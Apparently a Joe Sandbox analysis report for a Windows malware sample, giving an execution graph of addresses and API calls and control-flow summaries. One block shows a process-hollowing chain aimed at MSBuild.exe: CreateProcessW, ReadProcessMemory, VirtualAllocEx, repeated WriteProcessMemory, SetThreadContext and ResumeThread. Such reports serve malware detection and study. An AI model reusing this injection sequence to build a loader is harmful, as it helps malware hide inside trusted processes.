17673->17674 17675 d8c309 17674->17675 17676 d91334 17675->17676 17677 d91469 std::locale::_Setgloballocale 21 API calls 17676->17677 17678 d8c311 17677->17678 17680 d890a8 17679->17680 17681 d8cb29 17680->17681 17698 d97016 17681->17698 17685 d8cb3a 17686 d8cb45 17685->17686 17712 d97052 17685->17712 17686->17626 17688 d8cb32 17688->17626 17752 d9970e 17689->17752 17692 d8cb48 17693 d8cb5b 17692->17693 17694 d8cb51 17692->17694 17693->17627 17695 d960e9 ___vcrt_uninitialize_ptd 6 API calls 17694->17695 17696 d8cb56 17695->17696 17697 d97052 ___vcrt_uninitialize_locks DeleteCriticalSection 17696->17697 17697->17693 17699 d9701f 17698->17699 17701 d97048 17699->17701 17702 d8cb2e 17699->17702 17716 da1b6a 17699->17716 17703 d97052 ___vcrt_uninitialize_locks DeleteCriticalSection 17701->17703 17702->17688 17704 d960b6 17702->17704 17703->17702 17733 da1a7b 17704->17733 17709 d960e6 17709->17685 17711 d960cb 17711->17685 17713 d9707c 17712->17713 17714 d9705d 17712->17714 17713->17688 17715 d97067 DeleteCriticalSection 17714->17715 17715->17713 17715->17715 17721 da1bfc 17716->17721 17719 da1ba2 InitializeCriticalSectionAndSpinCount 17720 da1b8d 17719->17720 17720->17699 17722 da1b84 17721->17722 17725 da1c1d 17721->17725 17722->17719 17722->17720 17723 da1c85 GetProcAddress 17723->17722 17725->17722 17725->17723 17726 da1c76 17725->17726 17728 da1bb1 LoadLibraryExW 17725->17728 17726->17723 17727 da1c7e FreeLibrary 17726->17727 17727->17723 17729 da1bf8 17728->17729 17730 da1bc8 GetLastError 17728->17730 17729->17725 17730->17729 17731 da1bd3 ___vcrt_InitializeCriticalSectionEx 17730->17731 17731->17729 17732 da1be9 LoadLibraryExW 17731->17732 17732->17725 17734 da1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17733->17734 17735 da1a95 17734->17735 17736 da1aae TlsAlloc 17735->17736 17737 d960c0 17735->17737 17737->17711 17738 da1b2c 17737->17738 17739 da1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17738->17739 17740 da1b46 17739->17740 17741 da1b61 
TlsSetValue 17740->17741 17742 d960d9 17740->17742 17741->17742 17742->17709 17743 d960e9 17742->17743 17744 d960f3 17743->17744 17746 d960f9 17743->17746 17747 da1ab6 17744->17747 17746->17711 17748 da1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17747->17748 17749 da1ad0 17748->17749 17750 da1ae8 TlsFree 17749->17750 17751 da1adc 17749->17751 17750->17751 17751->17746 17753 d9971e 17752->17753 17754 d890ba 17752->17754 17753->17754 17756 d98e82 17753->17756 17754->17630 17754->17692 17757 d98e89 17756->17757 17758 d98ecc GetStdHandle 17757->17758 17759 d98f2e 17757->17759 17760 d98edf GetFileType 17757->17760 17758->17757 17759->17753 17760->17757 17762 d939cf 17761->17762 17765 d939e5 17761->17765 17762->17765 17767 d93907 17762->17767 17764 d939dc 17764->17765 17784 d93ad4 17764->17784 17765->17633 17768 d93910 17767->17768 17769 d93913 17767->17769 17768->17764 17793 d98f45 17769->17793 17774 d93930 17826 d939f2 17774->17826 17775 d93924 17820 d97347 17775->17820 17780 d97347 ___free_lconv_mon 14 API calls 17781 d93954 17780->17781 17782 d97347 ___free_lconv_mon 14 API calls 17781->17782 17783 d9395a 17782->17783 17783->17764 17785 d93b45 17784->17785 17790 d93ae3 17784->17790 17785->17765 17786 d97491 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 17786->17790 17787 d98700 __Getctype 14 API calls 17787->17790 17788 d93b49 17789 d97347 ___free_lconv_mon 14 API calls 17788->17789 17789->17785 17790->17785 17790->17786 17790->17787 17790->17788 17792 d97347 ___free_lconv_mon 14 API calls 17790->17792 18388 d9e602 17790->18388 17792->17790 17794 d93919 17793->17794 17795 d98f4e 17793->17795 17799 d9e52b GetEnvironmentStringsW 17794->17799 17848 d9768e 17795->17848 17800 d9e543 17799->17800 17813 d9391e 17799->17813 17801 d97491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 17800->17801 17802 d9e560 17801->17802 17803 d9e56a FreeEnvironmentStringsW 17802->17803 17804 d9e575 17802->17804 17803->17813 17805 d97381 __fread_nolock 15 API calls 17804->17805 
17806 d9e57c 17805->17806 17807 d9e595 17806->17807 17808 d9e584 17806->17808 17810 d97491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 17807->17810 17809 d97347 ___free_lconv_mon 14 API calls 17808->17809 17811 d9e589 FreeEnvironmentStringsW 17809->17811 17812 d9e5a5 17810->17812 17811->17813 17814 d9e5ac 17812->17814 17815 d9e5b4 17812->17815 17813->17774 17813->17775 17816 d97347 ___free_lconv_mon 14 API calls 17814->17816 17817 d97347 ___free_lconv_mon 14 API calls 17815->17817 17818 d9e5b2 FreeEnvironmentStringsW 17816->17818 17817->17818 17818->17813 17821 d97352 HeapFree 17820->17821 17825 d9392a 17820->17825 17822 d97367 GetLastError 17821->17822 17821->17825 17823 d97374 __dosmaperr 17822->17823 17824 d934c5 __dosmaperr 12 API calls 17823->17824 17824->17825 17825->17764 17827 d93a07 17826->17827 17828 d98700 __Getctype 14 API calls 17827->17828 17829 d93a2e 17828->17829 17830 d93a40 17829->17830 17831 d93a36 17829->17831 17834 d93a9d 17830->17834 17836 d98700 __Getctype 14 API calls 17830->17836 17837 d93aac 17830->17837 17842 d93ac7 17830->17842 17844 d97347 ___free_lconv_mon 14 API calls 17830->17844 18369 d96fbc 17830->18369 17832 d97347 ___free_lconv_mon 14 API calls 17831->17832 17833 d93937 17832->17833 17833->17780 17835 d97347 ___free_lconv_mon 14 API calls 17834->17835 17835->17833 17836->17830 18378 d93997 17837->18378 17841 d97347 ___free_lconv_mon 14 API calls 17843 d93ab9 17841->17843 18384 d93bdd IsProcessorFeaturePresent 17842->18384 17846 d97347 ___free_lconv_mon 14 API calls 17843->17846 17844->17830 17846->17833 17847 d93ad3 17849 d97699 17848->17849 17850 d9769f 17848->17850 17895 d97feb 17849->17895 17854 d976a5 17850->17854 17900 d9802a 17850->17900 17855 d976aa 17854->17855 17917 d9411a 17854->17917 17873 d99306 17855->17873 17860 d976d1 17863 d9802a __Getctype 6 API calls 17860->17863 17861 d976e6 17862 d9802a __Getctype 6 API calls 17861->17862 17864 d976f2 17862->17864 17865 d976dd 17863->17865 17866 d97705 17864->17866 17867 
d976f6 17864->17867 17870 d97347 ___free_lconv_mon 14 API calls 17865->17870 17912 d978e4 17866->17912 17868 d9802a __Getctype 6 API calls 17867->17868 17868->17865 17870->17854 17872 d97347 ___free_lconv_mon 14 API calls 17872->17855 17874 d99330 17873->17874 18190 d99192 17874->18190 17877 d99349 17877->17794 17880 d99370 18204 d98f8d 17880->18204 17881 d99362 17882 d97347 ___free_lconv_mon 14 API calls 17881->17882 17882->17877 17885 d993a8 17886 d934c5 __dosmaperr 14 API calls 17885->17886 17887 d993ad 17886->17887 17889 d97347 ___free_lconv_mon 14 API calls 17887->17889 17888 d993ef 17891 d99438 17888->17891 18215 d996c1 17888->18215 17889->17877 17890 d993c3 17890->17888 17893 d97347 ___free_lconv_mon 14 API calls 17890->17893 17892 d97347 ___free_lconv_mon 14 API calls 17891->17892 17892->17877 17893->17888 17928 d9842d 17895->17928 17898 d98022 TlsGetValue 17899 d98010 17899->17850 17901 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 17900->17901 17902 d98046 17901->17902 17903 d976b9 17902->17903 17904 d98064 TlsSetValue 17902->17904 17903->17854 17905 d98700 17903->17905 17910 d9870d __Getctype 17905->17910 17906 d9874d 17946 d934c5 17906->17946 17907 d98738 RtlAllocateHeap 17908 d976c9 17907->17908 17907->17910 17908->17860 17908->17861 17910->17906 17910->17907 17943 d91650 17910->17943 17983 d97a4a 17912->17983 18085 d997c5 17917->18085 17920 d9412a 17922 d94134 IsProcessorFeaturePresent 17920->17922 17923 d94153 17920->17923 17924 d94140 17922->17924 17925 d91334 std::locale::_Setgloballocale 21 API calls 17923->17925 18115 d93c11 17924->18115 17927 d9415d 17925->17927 17929 d9845d 17928->17929 17932 d98007 17928->17932 17929->17932 17935 d98362 17929->17935 17932->17898 17932->17899 17933 d98477 GetProcAddress 17933->17932 17934 d98487 std::_Locinfo::_Locinfo_dtor 17933->17934 17934->17932 17937 d98373 ___vcrt_InitializeCriticalSectionEx 17935->17937 17936 d98409 17936->17932 17936->17933 17937->17936 17938 d98391 LoadLibraryExW 17937->17938 17942 
d983df LoadLibraryExW 17937->17942 17939 d983ac GetLastError 17938->17939 17940 d98410 17938->17940 17939->17937 17940->17936 17941 d98422 FreeLibrary 17940->17941 17941->17936 17942->17937 17942->17940 17949 d9168b 17943->17949 17960 d97724 GetLastError 17946->17960 17948 d934ca 17948->17908 17950 d91697 ___scrt_is_nonwritable_in_current_image 17949->17950 17955 d93ea8 EnterCriticalSection 17950->17955 17952 d916a2 std::locale::_Setgloballocale 17956 d916d9 17952->17956 17955->17952 17959 d93ebf LeaveCriticalSection 17956->17959 17958 d9165b 17958->17910 17959->17958 17961 d9773a 17960->17961 17962 d97740 17960->17962 17963 d97feb __Getctype 6 API calls 17961->17963 17964 d9802a __Getctype 6 API calls 17962->17964 17966 d97744 SetLastError 17962->17966 17963->17962 17965 d9775c 17964->17965 17965->17966 17968 d98700 __Getctype 12 API calls 17965->17968 17966->17948 17969 d97771 17968->17969 17970 d97779 17969->17970 17971 d9778a 17969->17971 17972 d9802a __Getctype 6 API calls 17970->17972 17973 d9802a __Getctype 6 API calls 17971->17973 17974 d97787 17972->17974 17975 d97796 17973->17975 17979 d97347 ___free_lconv_mon 12 API calls 17974->17979 17976 d9779a 17975->17976 17977 d977b1 17975->17977 17978 d9802a __Getctype 6 API calls 17976->17978 17980 d978e4 __Getctype 12 API calls 17977->17980 17978->17974 17979->17966 17981 d977bc 17980->17981 17982 d97347 ___free_lconv_mon 12 API calls 17981->17982 17982->17966 17984 d97a56 ___scrt_is_nonwritable_in_current_image 17983->17984 17997 d93ea8 EnterCriticalSection 17984->17997 17986 d97a60 17998 d97a90 17986->17998 17989 d97a9c 17990 d97aa8 ___scrt_is_nonwritable_in_current_image 17989->17990 18002 d93ea8 EnterCriticalSection 17990->18002 17992 d97ab2 18003 d97899 17992->18003 17994 d97aca 18007 d97aea 17994->18007 17997->17986 18001 d93ebf LeaveCriticalSection 17998->18001 18000 d97952 18000->17989 18001->18000 18002->17992 18004 d978a8 __Getctype 18003->18004 18006 d978cf __Getctype 18003->18006 18004->18006 18010 
d9ba79 18004->18010 18006->17994 18084 d93ebf LeaveCriticalSection 18007->18084 18009 d97710 18009->17872 18011 d9baf9 18010->18011 18014 d9ba8f 18010->18014 18013 d97347 ___free_lconv_mon 14 API calls 18011->18013 18036 d9bb47 18011->18036 18015 d9bb1b 18013->18015 18014->18011 18016 d9bac2 18014->18016 18018 d97347 ___free_lconv_mon 14 API calls 18014->18018 18017 d97347 ___free_lconv_mon 14 API calls 18015->18017 18025 d97347 ___free_lconv_mon 14 API calls 18016->18025 18037 d9bae4 18016->18037 18019 d9bb2e 18017->18019 18023 d9bab7 18018->18023 18024 d97347 ___free_lconv_mon 14 API calls 18019->18024 18020 d97347 ___free_lconv_mon 14 API calls 18026 d9baee 18020->18026 18021 d9bbb5 18027 d97347 ___free_lconv_mon 14 API calls 18021->18027 18022 d9bb55 18022->18021 18035 d97347 14 API calls ___free_lconv_mon 18022->18035 18038 d9aedb 18023->18038 18029 d9bb3c 18024->18029 18030 d9bad9 18025->18030 18031 d97347 ___free_lconv_mon 14 API calls 18026->18031 18032 d9bbbb 18027->18032 18033 d97347 ___free_lconv_mon 14 API calls 18029->18033 18066 d9b1f6 18030->18066 18031->18011 18032->18006 18033->18036 18035->18022 18078 d9bc13 18036->18078 18037->18020 18039 d9aeec 18038->18039 18040 d9afd5 18038->18040 18041 d9aefd 18039->18041 18042 d97347 ___free_lconv_mon 14 API calls 18039->18042 18040->18016 18043 d9af0f 18041->18043 18044 d97347 ___free_lconv_mon 14 API calls 18041->18044 18042->18041 18044->18043 18067 d9b203 18066->18067 18077 d9b25b 18066->18077 18068 d9b213 18067->18068 18070 d97347 ___free_lconv_mon 14 API calls 18067->18070 18070->18068 18077->18037 18079 d9bc3f 18078->18079 18080 d9bc20 18078->18080 18079->18022 18080->18079 18081 d9b2da __Getctype 14 API calls 18080->18081 18082 d9bc39 18081->18082 18083 d97347 ___free_lconv_mon 14 API calls 18082->18083 18083->18079 18084->18009 18121 d99a48 18085->18121 18088 d997ec 18094 d997f8 ___scrt_is_nonwritable_in_current_image 18088->18094 18089 d97724 __dosmaperr 14 API calls 18098 d99829 
std::locale::_Setgloballocale 18089->18098 18090 d99848 18093 d934c5 __dosmaperr 14 API calls 18090->18093 18091 d99832 18091->17920 18092 d9985a std::locale::_Setgloballocale 18095 d99890 std::locale::_Setgloballocale 18092->18095 18135 d93ea8 EnterCriticalSection 18092->18135 18096 d9984d 18093->18096 18094->18089 18094->18090 18094->18092 18094->18098 18101 d999ca 18095->18101 18102 d998cd 18095->18102 18112 d998fb 18095->18112 18132 d93bb0 18096->18132 18098->18090 18098->18091 18098->18092 18103 d999d5 18101->18103 18167 d93ebf LeaveCriticalSection 18101->18167 18102->18112 18136 d975d3 GetLastError 18102->18136 18106 d91334 std::locale::_Setgloballocale 21 API calls 18103->18106 18108 d999dd 18106->18108 18109 d975d3 __Getctype 39 API calls 18113 d99950 18109->18113 18111 d975d3 __Getctype 39 API calls 18111->18112 18163 d99976 18112->18163 18113->18091 18114 d975d3 __Getctype 39 API calls 18113->18114 18114->18091 18116 d93c2d __fread_nolock std::locale::_Setgloballocale 18115->18116 18117 d93c59 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18116->18117 18120 d93d2a std::locale::_Setgloballocale 18117->18120 18119 d93d48 18119->17923 18182 d88eaa 18120->18182 18122 d99a54 ___scrt_is_nonwritable_in_current_image 18121->18122 18127 d93ea8 EnterCriticalSection 18122->18127 18124 d99a62 18128 d99aa4 18124->18128 18127->18124 18131 d93ebf LeaveCriticalSection 18128->18131 18130 d9411f 18130->17920 18130->18088 18131->18130 18168 d93dff 18132->18168 18134 d93bbc 18134->18091 18135->18095 18137 d975e9 18136->18137 18140 d975ef 18136->18140 18138 d97feb __Getctype 6 API calls 18137->18138 18138->18140 18139 d9802a __Getctype 6 API calls 18141 d9760b 18139->18141 18140->18139 18161 d975f3 SetLastError 18140->18161 18142 d98700 __Getctype 14 API calls 18141->18142 18141->18161 18144 d97620 18142->18144 18147 d97639 18144->18147 18148 d97628 18144->18148 18145 d97688 18149 d9411a CallUnexpected 37 API calls 18145->18149 18146 d97683 
18146->18111 18151 d9802a __Getctype 6 API calls 18147->18151 18150 d9802a __Getctype 6 API calls 18148->18150 18152 d9768d 18149->18152 18153 d97636 18150->18153 18154 d97645 18151->18154 18158 d97347 ___free_lconv_mon 14 API calls 18153->18158 18155 d97649 18154->18155 18156 d97660 18154->18156 18157 d9802a __Getctype 6 API calls 18155->18157 18159 d978e4 __Getctype 14 API calls 18156->18159 18157->18153 18158->18161 18160 d9766b 18159->18160 18162 d97347 ___free_lconv_mon 14 API calls 18160->18162 18161->18145 18161->18146 18162->18161 18164 d9997a 18163->18164 18166 d99942 18163->18166 18181 d93ebf LeaveCriticalSection 18164->18181 18166->18091 18166->18109 18166->18113 18167->18103 18169 d93e11 _Fputc 18168->18169 18172 d93d59 18169->18172 18171 d93e29 _Fputc 18171->18134 18173 d93d69 18172->18173 18174 d93d70 18172->18174 18175 d8f510 __strnicoll 16 API calls 18173->18175 18176 d93dd6 __strnicoll GetLastError SetLastError 18174->18176 18178 d93d7e 18174->18178 18175->18174 18177 d93da5 18176->18177 18177->18178 18179 d93bdd __Getctype 11 API calls 18177->18179 18178->18171 18180 d93dd5 18179->18180 18181->18166 18183 d88eb2 18182->18183 18184 d88eb3 IsProcessorFeaturePresent 18182->18184 18183->18119 18186 d8b1aa 18184->18186 18189 d8b290 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18186->18189 18188 d8b28d 18188->18119 18189->18188 18223 d8e7da 18190->18223 18193 d991b3 GetOEMCP 18195 d991dc 18193->18195 18194 d991c5 18194->18195 18196 d991ca GetACP 18194->18196 18195->17877 18197 d97381 18195->18197 18196->18195 18198 d973bf 18197->18198 18202 d9738f __Getctype 18197->18202 18199 d934c5 __dosmaperr 14 API calls 18198->18199 18201 d973bd 18199->18201 18200 d973aa RtlAllocateHeap 18200->18201 18200->18202 18201->17880 18201->17881 18202->18198 18202->18200 18203 d91650 codecvt 2 API calls 18202->18203 18203->18202 18205 d99192 41 API calls 18204->18205 18206 d98fad 18205->18206 18208 d98fea IsValidCodePage 
18206->18208 18213 d990b2 18206->18213 18214 d99005 __fread_nolock 18206->18214 18207 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18209 d99190 18207->18209 18210 d98ffc 18208->18210 18208->18213 18209->17885 18209->17890 18211 d99025 GetCPInfo 18210->18211 18210->18214 18211->18213 18211->18214 18213->18207 18263 d9951c 18214->18263 18216 d996cd ___scrt_is_nonwritable_in_current_image 18215->18216 18343 d93ea8 EnterCriticalSection 18216->18343 18218 d996d7 18344 d9945b 18218->18344 18224 d8e7f8 18223->18224 18225 d8e7f1 18223->18225 18224->18225 18226 d975d3 __Getctype 39 API calls 18224->18226 18225->18193 18225->18194 18227 d8e819 18226->18227 18231 d97bb6 18227->18231 18232 d97bc9 18231->18232 18234 d8e82f 18231->18234 18232->18234 18239 d9bc44 18232->18239 18235 d97be3 18234->18235 18236 d97c0b 18235->18236 18237 d97bf6 18235->18237 18236->18225 18237->18236 18260 d98f32 18237->18260 18240 d9bc50 ___scrt_is_nonwritable_in_current_image 18239->18240 18241 d975d3 __Getctype 39 API calls 18240->18241 18242 d9bc59 18241->18242 18249 d9bc9f 18242->18249 18252 d93ea8 EnterCriticalSection 18242->18252 18244 d9bc77 18253 d9bcc5 18244->18253 18249->18234 18250 d9411a CallUnexpected 39 API calls 18251 d9bcc4 18250->18251 18252->18244 18254 d9bcd3 __Getctype 18253->18254 18256 d9bc88 18253->18256 18255 d9ba79 __Getctype 14 API calls 18254->18255 18254->18256 18255->18256 18257 d9bca4 18256->18257 18258 d93ebf std::_Lockit::~_Lockit LeaveCriticalSection 18257->18258 18259 d9bc9b 18258->18259 18259->18249 18259->18250 18261 d975d3 __Getctype 39 API calls 18260->18261 18262 d98f37 18261->18262 18262->18236 18264 d99544 GetCPInfo 18263->18264 18265 d9960d 18263->18265 18264->18265 18270 d9955c 18264->18270 18266 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18265->18266 18268 d996bf 18266->18268 
18268->18213 18274 d989ec 18270->18274 18275 d8e7da __strnicoll 39 API calls 18274->18275 18276 d98a0c 18275->18276 18294 d973cf 18276->18294 18278 d98ac8 18281 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18278->18281 18279 d98ac0 18297 d8bc47 18279->18297 18280 d98a39 18280->18278 18280->18279 18284 d97381 __fread_nolock 15 API calls 18280->18284 18285 d98a5e __fread_nolock __alloca_probe_16 18280->18285 18282 d98aeb 18281->18282 18289 d98aed 18282->18289 18284->18285 18285->18279 18286 d973cf __fread_nolock MultiByteToWideChar 18285->18286 18287 d98aa7 18286->18287 18287->18279 18288 d98aae GetStringTypeW 18287->18288 18288->18279 18290 d8e7da __strnicoll 39 API calls 18289->18290 18291 d98b00 18290->18291 18301 d973f9 18294->18301 18298 d8bc51 18297->18298 18299 d8bc62 18297->18299 18298->18299 18303 d94c7a 18298->18303 18299->18278 18302 d973eb MultiByteToWideChar 18301->18302 18302->18280 18304 d97347 ___free_lconv_mon 14 API calls 18303->18304 18305 d94c92 18304->18305 18305->18299 18343->18218 18354 d94966 18344->18354 18346 d9947d 18347 d94966 __fread_nolock 29 API calls 18346->18347 18348 d9949c 18347->18348 18349 d994c3 18348->18349 18350 d97347 ___free_lconv_mon 14 API calls 18348->18350 18351 d99702 18349->18351 18350->18349 18368 d93ebf LeaveCriticalSection 18351->18368 18355 d94977 18354->18355 18358 d94973 _Yarn 18354->18358 18356 d9497e 18355->18356 18360 d94991 __fread_nolock 18355->18360 18357 d934c5 __dosmaperr 14 API calls 18356->18357 18359 d94983 18357->18359 18358->18346 18361 d93bb0 __strnicoll 29 API calls 18359->18361 18360->18358 18362 d949c8 18360->18362 18363 d949bf 18360->18363 18361->18358 18362->18358 18366 d934c5 __dosmaperr 14 API calls 18362->18366 18364 d934c5 __dosmaperr 14 API calls 18363->18364 18365 d949c4 18364->18365 18367 d93bb0 __strnicoll 29 API calls 18365->18367 18366->18365 18367->18358 18370 d96fd8 18369->18370 18371 d96fca 
Execution Graph (flattened node/edge listing; the interactive graph did not survive extraction and the listing is truncated at both ends). Recoverable information:

Most nodes resolve to CRT/STL internals (__dosmaperr, ___free_lconv_mon, __strnicoll, __Getctype, __fread_nolock, std::locale::_Setgloballocale, std::_Locinfo::_Locinfo_dtor, std::_Throw_Cpp_error, Concurrency task-scheduling handlers, ___scrt_uninitialize_crt) and carry only "N API calls" summaries.

Win32 API chain at db21a9-db246c: GetPEB (db232c) -> CreateProcessW, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory, VirtualAllocEx (db233e) -> WriteProcessMemory (db23e5) -> WriteProcessMemory (db242f) -> WriteProcessMemory, Wow64SetThreadContext, ResumeThread (db246c). A new process is created, its memory is written three times and its thread context is redirected before the thread is resumed, which is consistent with RunPE / process-hollowing style PE injection into a freshly created process.

Other Win32 calls resolved in the graph: GetCurrentProcess, TerminateProcess (d93bfe); GetCurrentThreadId (d816c2); CreateThread (d91167); GetModuleHandleExW (d911e7); CloseHandle (d91224), FreeLibrary (d91233); ExitThread (d9125c); SetEnvironmentVariableW (da5503); HeapSize (da4cd4); HeapReAlloc (da12ab); MultiByteToWideChar (d973cf); WideCharToMultiByte (d97491); ReadFile (d9e042); RaiseException (d8c4c2, d84250, d89261); EnterCriticalSection / LeaveCriticalSection (d8f144 / d8f158, d93ea8 / d93ebf, d9ebd5 / d9ebf8); DeleteCriticalSection (d8f250); GetLastError at several error-handling sites.
22175->22184 22177 d99c5a 22189 d99c79 22177->22189 22178 d99bee 22178->22177 22180 d99c2e DeleteCriticalSection 22178->22180 22185 d94169 22178->22185 22183 d97347 ___free_lconv_mon 14 API calls 22180->22183 22183->22178 22184->22178 22186 d9417c _Fputc 22185->22186 22192 d94227 22186->22192 22188 d94188 _Fputc 22188->22178 22264 d93ebf LeaveCriticalSection 22189->22264 22191 d99c66 22191->22168 22193 d94233 ___scrt_is_nonwritable_in_current_image 22192->22193 22194 d9423d 22193->22194 22195 d94260 22193->22195 22196 d93d59 __strnicoll 29 API calls 22194->22196 22202 d94258 22195->22202 22203 d8f144 EnterCriticalSection 22195->22203 22196->22202 22198 d9427e 22204 d94199 22198->22204 22200 d9428b 22218 d942b6 22200->22218 22202->22188 22203->22198 22205 d941c9 22204->22205 22206 d941a6 22204->22206 22208 d9437f ___scrt_uninitialize_crt 64 API calls 22205->22208 22216 d941c1 22205->22216 22207 d93d59 __strnicoll 29 API calls 22206->22207 22207->22216 22209 d941e1 22208->22209 22210 d99c82 14 API calls 22209->22210 22211 d941e9 22210->22211 22212 d9aab8 __fread_nolock 29 API calls 22211->22212 22213 d941f5 22212->22213 22221 d9ecd1 22213->22221 22216->22200 22217 d97347 ___free_lconv_mon 14 API calls 22217->22216 22263 d8f158 LeaveCriticalSection 22218->22263 22220 d942bc 22220->22202 22224 d941fc 22221->22224 22225 d9ecfa 22221->22225 22222 d9ed49 22223 d93d59 __strnicoll 29 API calls 22222->22223 22223->22224 22224->22216 22224->22217 22225->22222 22226 d9ed21 22225->22226 22228 d9ed74 22226->22228 22229 d9ed80 ___scrt_is_nonwritable_in_current_image 22228->22229 22236 d9ebd5 EnterCriticalSection 22229->22236 22231 d9ed8e 22232 d9edbf 22231->22232 22237 d9ec31 22231->22237 22250 d9edf9 22232->22250 22236->22231 22238 d9e98c __fread_nolock 29 API calls 22237->22238 22239 d9ec41 22238->22239 22240 d9ec47 22239->22240 22241 d9ec79 22239->22241 22243 d9e98c __fread_nolock 29 API calls 22239->22243 22253 d9e9f6 22240->22253 22241->22240 22244 d9e98c __fread_nolock 29 
API calls 22241->22244 22245 d9ec70 22243->22245 22246 d9ec85 CloseHandle 22244->22246 22247 d9e98c __fread_nolock 29 API calls 22245->22247 22246->22240 22248 d9ec91 GetLastError 22246->22248 22247->22241 22248->22240 22249 d9ec9f __fread_nolock 22249->22232 22262 d9ebf8 LeaveCriticalSection 22250->22262 22252 d9ede2 22252->22224 22254 d9ea6c 22253->22254 22255 d9ea05 22253->22255 22256 d934c5 __dosmaperr 14 API calls 22254->22256 22255->22254 22261 d9ea2f 22255->22261 22257 d9ea71 22256->22257 22258 d934d8 __dosmaperr 14 API calls 22257->22258 22259 d9ea5c 22258->22259 22259->22249 22260 d9ea56 SetStdHandle 22260->22259 22261->22259 22261->22260 22262->22252 22263->22220 22264->22191

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00DB211B,00DB210B), ref: 00DB233F
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00DB2352
• Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00DB2370
• ReadProcessMemory.KERNELBASE(00000138,?,00DB215F,00000004,00000000), ref: 00DB2394
• VirtualAllocEx.KERNELBASE(00000138,?,?,00003000,00000040), ref: 00DB23BF
• WriteProcessMemory.KERNELBASE(00000138,00000000,?,?,00000000,?), ref: 00DB2417
• WriteProcessMemory.KERNELBASE(00000138,00400000,?,?,00000000,?,00000028), ref: 00DB2462
• WriteProcessMemory.KERNELBASE(00000138,?,?,00000004,00000000), ref: 00DB24A0
• Wow64SetThreadContext.KERNEL32(0000008C,00D70000), ref: 00DB24DC
• ResumeThread.KERNELBASE(0000008C), ref: 00DB24EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: c401c7c4eed8237b087d88cc671c4cd657f927fc33073c425b251e2272dd053b
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: ADB1F77660064AEFDB60CF68CC80BEA73A5FF88714F158514EA09AB341D774FA51CBA4

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,6FF93721,?,00D98471,?,?,00000000), ref: 00D98423
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
• Instruction ID: bacdf6155509dc8be18f8ee99360d623ce22004bd56c8a94474ecdc33e326e93
• Opcode Fuzzy Hash: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
• Instruction Fuzzy Hash: 6421C331A01315EBDF219B65EC44A5F3B59AF46BA0F290221E951E7391DB30ED01D6F0

Control-flow Graph

APIs
Memory Dump Source
